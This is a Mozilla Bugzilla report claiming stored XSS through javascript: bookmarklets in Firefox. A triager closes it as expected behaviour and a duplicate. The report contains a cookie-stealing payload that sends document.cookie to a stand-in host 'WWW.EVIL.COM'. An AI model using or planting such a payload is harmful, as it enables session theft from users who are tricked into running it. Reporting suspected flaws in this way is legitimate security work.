Closed Bug 1510537 Opened 6 years ago Closed 6 years ago

Stored XSS in Bookmark button

Categories

(Core :: Security, defect)

defect
Not set
normal

Tracking

()

RESOLVED DUPLICATE of bug 371923

People

(Reporter: muaz.work66, Unassigned)

Details

Attachments

(1 file)

User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 Steps to reproduce: 1. Open Mozilla Firefox browser. 2. Add a new bookmark by clicking "New Bookmark..." from Bookmarks Toolbar. 3. Enter any name to the Name field. 4. Enter the following payload in the Location field. javascript:prompt(document.domain,document.cookie) 5. Click Add button. Your bookmark will be saved. 6. Open any website from Mozilla Firefox, such as PayPal, Skrill, Gmail, Uber, Facebook etc. 7. Now click your new Bookmark button. 8. XSS will be triggered with current domain and cookies. 9. It will work on any website in Mozilla Firefox browser. Actual results: While click on the button (which location was set to payload), current website's domain and cookies' are poped-up with XSS. Expected results: This bug allow an attacker to steal users' cookies, credentials and able to do more. If an attacker use the following payload, then he can silently steal cookies and redirect the user to an evil site. Payload: javascript:document.location='http://WWW.EVIL.COM/cookiestealer.php?c='+document.cookie
This is a known feature of javascript bookmarklets, and not a bug. The user has to add and run the bookmark themselves.
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 6 years ago
Resolution: --- → DUPLICATE
Component: Untriaged → Security
Product: Firefox → Core
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Created:
Updated:
Size: